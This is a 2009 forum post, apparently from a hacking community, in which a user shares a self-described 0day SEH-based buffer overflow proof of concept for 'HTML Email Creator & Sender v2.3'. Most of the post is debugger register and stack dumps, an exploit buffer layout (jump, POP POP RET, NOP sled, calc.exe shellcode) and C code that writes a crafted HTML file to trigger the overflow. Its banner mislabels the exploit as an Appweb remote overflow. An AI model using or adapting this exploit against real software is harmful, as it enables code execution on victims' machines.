fl0 fl0w Posted August 15, 2009 Report Share Posted August 15, 2009 Salut bro's ,got 0F**gday /*0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc ******************************************************************** Debugging info Seh handler is overwriten , the offset is at 60 bytes in our buffer so you have to build your buffer as follows: [PONTER TO NEXT SEH]-------[SEH HANDLER]----[NOP]------[SHELLCODE] | | | | JMP 4 bytes POP POP RET 50*0x90 calc.exe ********************************************************************* */ /* Code execution is possible. CPU Registers EAX 00000000 ECX 00000208 EDX 00000000 EBX 00000029 ESP 0012E224 EBP 7C8101B1 kernel32.lstrcpynA ESI 90909090 <------------------CONTROLED EDI 00001209 EIP 0042E1C7 HtmlEmai.0042E1C7 ESP points to 0012E224 Stack looks like 0012E224 90909090 0012E228 00000029 )... 0012E22C 00415D56 V]A. RETURN to HtmlEmai.00415D56 from HtmlEmai.0042E1BF 0012E230 00000208 .. 0012E234 003F9758 X—?. 0012E238 003FBD19 ½?. 0012E23C 00000000 .... 0012E240 00000029 )... 0012E244 90909090 0012E248 90909090 0012E24C 90909090 0012E250 90909090 0012E254 90909090 0012E258 90909090 0012E25C 90909090 0012E260 90909090 0012E264 90909090 0012E268 90909090 0012E26C 90909090 0012E270 90909090 0012E274 90909090 0012E278 90909090 0012E27C 909011EB ë 0012E280 41414141 AAAA 0012E284 90909090 0012E288 90909090 0012E28C 90909090 0012E290 90909090 0012E294 90909090 0012E298 90909090 0012E29C 90909090 0012E2A0 90909090 0012E2A4 90909090 0012E2A8 90909090 0012E2AC EB5903EB ëYë 0012E2B0 FFF8E805 èøÿ 0012E2B4 4949FFFF ÿÿII 0012E2B8 49494949 IIII 0012E2BC 49494949 IIII 0012E2C0 49494949 IIII 0012E2C4 51494949 IIIQ 0012E2C8 636A375A Z7jc 0012E2CC 30423058 X0B0 0012E2D0 426B4250 PBkB 0012E2D4 42417341 AsAB 0012E2D8 32414232 2BA2 0012E2DC 41304141 AA0A 0012E2E0 42385841 AX8B 0012E2E4 38755042 BPu8 */ /* ASM Instructions 0042E1C7 |. 8B06 MOV EAX,DWORD PTR DS:[ESI] <-------This is where goes wrong => DS:[90909090]=??? EAX=00000000 0042E1C9 |. 8378 F4 01 CMP DWORD PTR DS:[EAX-C],1 0042E1CD |. 8D58 F4 LEA EBX,DWORD PTR DS:[EAX-C] 0042E1D0 |. 7F 05 JG SHORT HtmlEmai.0042E1D7 EAX is writen with DWORD NULL byte. */ /* Seh Chain 0012E894 909011EB ë Pointer to next SEH record <------ overwrite with this "\xEb\x04\x90\x90" 0012E898 41414141 AAAA SE handler <-----POP POP RET */ #include <stdio.h> #include <windows.h> #include <string.h> #include <getopt.h> #include <stdint.h> typedef struct Start { uint8_t sh; uint8_t st; uint8_t sm; uint8_t sl; }HTML; typedef struct Middle { uint8_t sh; uint8_t se; uint8_t sa; uint8_t sd; }HEAD; typedef struct End { uint8_t sb; uint8_t so; uint8_t sD; uint8_t sy; }BODY; #define BUFFERSIZE 0x1A0A #define FILESIZE 29A #define SRC "<img src=" void Fbuild(char *fname) { HTML *ht_ml; HEAD *he_ad; BODY *bo_dy; char *memBuffer; //"\x48\x54\x4D\x4C" -html ht_ml = (HTML*)malloc(sizeof(HTML)); he_ad = (HEAD*)malloc(sizeof(HEAD)); bo_dy = (BODY*)malloc(sizeof(BODY)); memBuffer = (char*)malloc(BUFFERSIZE); if(ht_ml == NULL || he_ad == NULL || bo_dy == NULL || memBuffer == NULL) { exit(-1); } ht_ml->sh = 0x48; ht_ml->st = 0x54; ht_ml->sm = 0x4D; ht_ml->sl = 0x4C; //second structure //HEAD "\x48\x45\x41\x44" he_ad->sh = 0x48; he_ad->se = 0x45; he_ad->sa = 0x41; he_ad->sd = 0x44; //thierd structure //"\x42\x4F\x44\x59" bo_dy->sb = 0x42; bo_dy->so = 0x4F; bo_dy->sD = 0x44; bo_dy->sy = 0x59; FILE *f; f = fopen(fname, "w"); if( f == NULL) { exit(-1); } int32_t offset = 0; memcpy(memBuffer, "<", 1); offset += 1; memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml)); offset += sizeof(ht_ml); memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, he_ad, sizeof(he_ad)); offset += sizeof(he_ad); memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, "\\", 1); offset += 1; memcpy(memBuffer+offset, he_ad, sizeof(he_ad)); offset += sizeof(he_ad); memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy)); offset += sizeof(bo_dy); memcpy(memBuffer+offset, ">", 1); offset += 1; uint8_t shit[] ={ 0x3C,0x69,0x6D,0x67,0x20,0x73,0x72,0x63,0x3D }; memcpy(memBuffer+offset, shit, sizeof(shit)); offset += sizeof(shit); memset(memBuffer+offset, 0x22, 1); offset += 1; memset(memBuffer+offset, 0x41, 4616); offset += 4616; memset(memBuffer+offset, 0x22, 1); offset += 1; memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, "\\", 1); offset += 1; memcpy(memBuffer+offset, bo_dy, sizeof(bo_dy)); offset += sizeof(bo_dy); memcpy(memBuffer+offset, ">", 1); offset += 1; memcpy(memBuffer+offset, "<", 1); offset += 1; memcpy(memBuffer+offset, "\\", 1); offset += 1; memcpy(memBuffer+offset, ht_ml, sizeof(ht_ml)); offset += sizeof(ht_ml); memcpy(memBuffer+offset, ">", 1); offset += 2; fwrite(memBuffer, offset , 1, f); fwrite("\x00", 1, 1, f); printf("File Done!\n"); } int main(int argc, char *argv[]) { char *fname = argv[1]; system("CLS"); fprintf(stdout , ":: ::\n"); fprintf(stdout , "Embedthis Appweb Remote Stack Overflow POC\n"); fprintf(stdout , "All Credits:fl0 fl0w\n"); fprintf(stdout , ":: ::\n"); if(argc < 2) { printf("Usage is %s filename.html\n", argv[0]); exit(-1); } Fbuild(fname); return 0; } 1 Quote Link to comment Share on other sites More sharing options...
hirosima Posted September 2, 2009 Report Share Posted September 2, 2009 presupun ca trebuie sa fie vulnerabil... Quote Link to comment Share on other sites More sharing options...
